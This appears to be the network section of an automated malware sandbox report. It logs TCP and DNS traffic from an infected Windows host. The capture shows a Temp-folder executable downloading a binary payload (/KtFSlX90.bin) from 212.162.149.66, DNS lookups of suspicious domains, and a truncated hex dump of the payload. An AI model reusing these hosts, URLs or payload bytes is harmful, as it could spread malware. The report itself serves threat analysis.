Dec 10, 2024 13:53:14.175760984 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.175820112 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.175864935 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.178406954 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.178423882 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.178447962 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.178462982 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.179801941 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.179848909 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.179862976 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.179897070 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.182396889 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.182439089 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.182526112 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.182574034 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.185178041 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.185225010 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.185354948 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.185399055 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.187705994 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.187768936 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.187810898 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.187865973 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.190382957 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.190434933 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.190588951 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.190628052 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.193025112 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.193063974 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.193162918 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.193202972 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.195758104 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.195770025 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.195802927 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.198358059 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.198419094 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.198453903 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.198494911 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.200336933 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.200376034 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.200525999 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.200565100 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.202253103 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.202291965 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.202361107 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.202404022 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.204248905 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.204288960 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.204361916 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.204401970 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.206280947 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.206320047 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.206387043 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.206423998 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.208108902 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.208148956 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.208230019 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.208264112 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.210216999 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.210283041 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.210460901 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.210506916 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.212131023 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.212176085 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.212263107 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.212302923 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.214010000 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.214051962 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.214085102 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.214127064 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.215970039 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.216018915 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.216217041 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.216263056 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.217896938 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.217940092 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.218024969 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.218066931 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.219886065 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.219934940 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.220004082 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.220046043 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.221807003 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.221878052 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.221910954 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.221952915 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.223752975 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.223795891 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.223912954 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.223969936 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.225724936 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.225771904 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.225810051 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.225847006 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.335570097 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.335608006 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.335757017 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.336220026 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.336266994 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.336342096 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.336385965 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.337969065 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.338015079 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.338063955 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.338118076 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.339500904 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.339545965 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.339577913 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.339626074 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.341111898 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.341157913 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.341217041 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.341263056 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.342720032 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.342766047 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.343141079 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.343185902 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.344402075 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.344444990 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.344470978 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.344511986 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.345961094 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.346009970 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.346159935 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.346203089 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.347564936 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.347623110 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.347649097 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.347695112 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.349006891 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.349070072 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.349124908 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.349191904 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.350451946 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.350506067 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.350554943 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.350599051 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.351984024 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.352034092 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.352041960 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.352075100 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.353437901 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.353483915 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.353568077 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.353614092 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.354969025 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.355020046 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.355102062 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.355142117 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.356471062 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.356539011 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.356554985 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.356571913 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.357978106 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.358036041 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.358081102 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.358141899 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.359417915 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.359467030 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.359535933 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.359575033 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.360898972 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.360944986 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.361183882 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.361222982 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.362432003 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.362478018 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.362591982 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.362633944 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.363883972 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.363938093 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.363981962 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.364023924 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.365351915 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.365402937 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.365492105 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.365533113 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.366892099 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.366961956 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.367019892 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.367060900 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.368443966 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.368486881 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.368618965 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.368657112 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.369966984 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.370011091 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.370199919 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.370239019 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.371387005 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.371432066 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.371457100 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.371490955 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.372843981 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.372899055 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.372961044 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.372999907 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.374459982 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.374502897 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.374591112 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.374633074 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.376054049 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.376102924 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.376321077 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.376364946 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.377360106 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.377424002 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.377459049 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.377501011 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.378820896 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.378858089 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.378952980 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.378995895 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.380367994 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.380413055 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.380496025 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.380541086 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.381881952 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.381926060 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.382004023 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.382054090 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.383320093 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.383361101 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.383517027 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.383562088 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.385123968 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.385166883 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.385356903 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.385396004 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.386670113 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.386709929 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.386746883 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.386790037 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.387794971 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.387861013 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.387953043 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.387995005 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.389347076 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.389394999 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.389410973 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.389452934 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.390778065 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.390825987 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.390995979 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.391038895 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.392410994 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.392458916 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.392483950 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.392527103 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.393975019 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.394023895 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.394079924 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.394124031 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.395246983 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.395302057 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.395354986 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.395399094 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.396754980 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.396797895 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:14.396802902 CET	80	49850	212.162.149.66	192.168.2.6
Dec 10, 2024 13:53:14.396847010 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:30.264404058 CET	49850	80	192.168.2.6	212.162.149.66
Dec 10, 2024 13:53:40.690046072 CET	49915	80	192.168.2.6	165.22.38.185
Dec 10, 2024 13:53:40.811393023 CET	80	49915	165.22.38.185	192.168.2.6
Dec 10, 2024 13:53:40.811583042 CET	49915	80	192.168.2.6	165.22.38.185
Dec 10, 2024 13:53:40.822480917 CET	49915	80	192.168.2.6	165.22.38.185
Dec 10, 2024 13:53:40.941878080 CET	80	49915	165.22.38.185	192.168.2.6
Dec 10, 2024 13:53:41.898101091 CET	80	49915	165.22.38.185	192.168.2.6
Dec 10, 2024 13:53:41.898230076 CET	80	49915	165.22.38.185	192.168.2.6
Dec 10, 2024 13:53:41.898305893 CET	49915	80	192.168.2.6	165.22.38.185
Dec 10, 2024 13:53:41.941762924 CET	49915	80	192.168.2.6	165.22.38.185
Dec 10, 2024 13:53:42.061160088 CET	80	49915	165.22.38.185	192.168.2.6
Dec 10, 2024 13:53:57.491626978 CET	49954	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:53:57.613888025 CET	80	49954	154.88.22.104	192.168.2.6
Dec 10, 2024 13:53:57.616000891 CET	49954	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:53:57.714418888 CET	49954	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:53:57.837344885 CET	80	49954	154.88.22.104	192.168.2.6
Dec 10, 2024 13:53:59.133605957 CET	80	49954	154.88.22.104	192.168.2.6
Dec 10, 2024 13:53:59.133795977 CET	80	49954	154.88.22.104	192.168.2.6
Dec 10, 2024 13:53:59.133846045 CET	49954	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:53:59.218873978 CET	49954	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:54:00.238439083 CET	49961	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:54:00.359044075 CET	80	49961	154.88.22.104	192.168.2.6
Dec 10, 2024 13:54:00.359122992 CET	49961	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:54:01.365315914 CET	49961	80	192.168.2.6	154.88.22.104
Dec 10, 2024 13:54:01.486558914 CET	80	49961	154.88.22.104	192.168.2.6
Dec 10, 2024 13:54:01.890028000 CET	80	49961	154.88.22.104	192.168.2.6
Dec 10, 2024 13:54:01.890254021 CET	80	49961	154.88.22.104	192.168.2.6
Dec 10, 2024 13:54:01.890374899 CET	49961	80	192.168.2.6	154.88.22.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:53:40.169543982 CET	59426	53	192.168.2.6	1.1.1.1
Dec 10, 2024 13:53:40.681787968 CET	53	59426	1.1.1.1	192.168.2.6
Dec 10, 2024 13:53:57.026607990 CET	55024	53	192.168.2.6	1.1.1.1
Dec 10, 2024 13:53:57.445919037 CET	53	55024	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 13:53:40.169543982 CET	192.168.2.6	1.1.1.1	0x548d	Standard query (0)	www.carhireheaven.online	A (IP address)	IN (0x0001)	false
Dec 10, 2024 13:53:57.026607990 CET	192.168.2.6	1.1.1.1	0x6079	Standard query (0)	www.dy01urj.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 13:53:40.681787968 CET	1.1.1.1	192.168.2.6	0x548d	No error (0)	www.carhireheaven.online	carhireheaven.online		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 13:53:40.681787968 CET	1.1.1.1	192.168.2.6	0x548d	No error (0)	carhireheaven.online		165.22.38.185	A (IP address)	IN (0x0001)	false
Dec 10, 2024 13:53:57.445919037 CET	1.1.1.1	192.168.2.6	0x6079	No error (0)	www.dy01urj.pro		154.88.22.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

212.162.149.66

www.carhireheaven.online

www.dy01urj.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49850	212.162.149.66	80	5204	C:\Users\user\AppData\Local\Temp\Opfattelsers.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:53:12.422146082 CET	171	OUT	GET /KtFSlX90.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 212.162.149.66 Cache-Control: no-cache
Dec 10, 2024 13:53:13.567116022 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 10 Dec 2024 08:30:03 GMT Accept-Ranges: bytes ETag: "c1867eb5dd4adb1:0" Server: Microsoft-IIS/8.5 Date: Tue, 10 Dec 2024 12:53:14 GMT Content-Length: 287808 Data Raw: 4b 7a 29 bb 61 f6 1a 6a 70 c3 e1 55 16 e0 31 61 e6 1d ac 03 27 77 7e 17 94 75 b9 06 ee aa 45 d7 9c 24 d8 24 60 19 d9 2c 11 7a cc 4d fb 9b 1c b0 ce c7 59 4a 5f 6c 12 ea 04 54 d3 2e 33 91 19 a4 cb 3d 83 33 33 83 76 bc 86 eb d3 33 59 1b a0 84 b8 0a 85 cc 8a 52 25 ef fa ae e6 e4 82 24 f0 0b d1 2d 63 58 78 99 03 58 a7 cc 92 d4 d5 e5 36 92 b9 8c 9c d5 a1 a7 e5 d2 a5 94 bc 08 82 26 31 06 4e fa 69 12 99 2e dd 9b 6f 2f ec 33 eb d7 51 4f fc f6 dc 53 5f 64 ba 9f 8d 33 95 bd c8 e8 d9 14 5b 81 a9 88 9b 6f a8 7a 0b 79 b5 0d 17 6d 90 a0 e5 f1 d5 1a a1 21 20 05 42 60 18 b3 fd d1 4a 19 f6 74 94 f8 4b dc 24 b8 f6 ba 5d 3e 47 50 0e 0d 72 0f cd 6b e7 0d 32 10 b3 fa 3f 99 33 81 36 4f 85 72 2a 86 39 e6 2e 7f 94 67 5f 8d 9b 86 15 15 5c 6b d6 bd 61 fa d5 00 02 cd 93 3c ef f9 02 7c 27 a6 59 c9 55 2c a9 0a 11 a9 0a 1b 20 74 78 e3 1c 93 b5 8a 50 64 13 64 b5 be 7b 4a 14 e4 fb 24 61 03 b7 0e d6 81 31 30 34 17 20 f2 70 87 35 19 13 bc 9f a4 4c cc ed 83 e5 b0 36 83 be 3e 8e e2 6e 61 25 8a 44 9d bf 6a 1c 33 2f c2 17 dc 3c a3 0f 37 [TRUNCATED] Data Ascii: Kz)ajpU1a'w~uE$$`,zMYJ_lT.3=33v3YR%$-cXxX6&1Ni.o/3QOS_d3[ozym! B`JtK$]>GPrk2?36Or9.g_\ka<\|'YU, txPdd{J$a104 p5L6>na%Dj3/<7'`=~b<\|~a 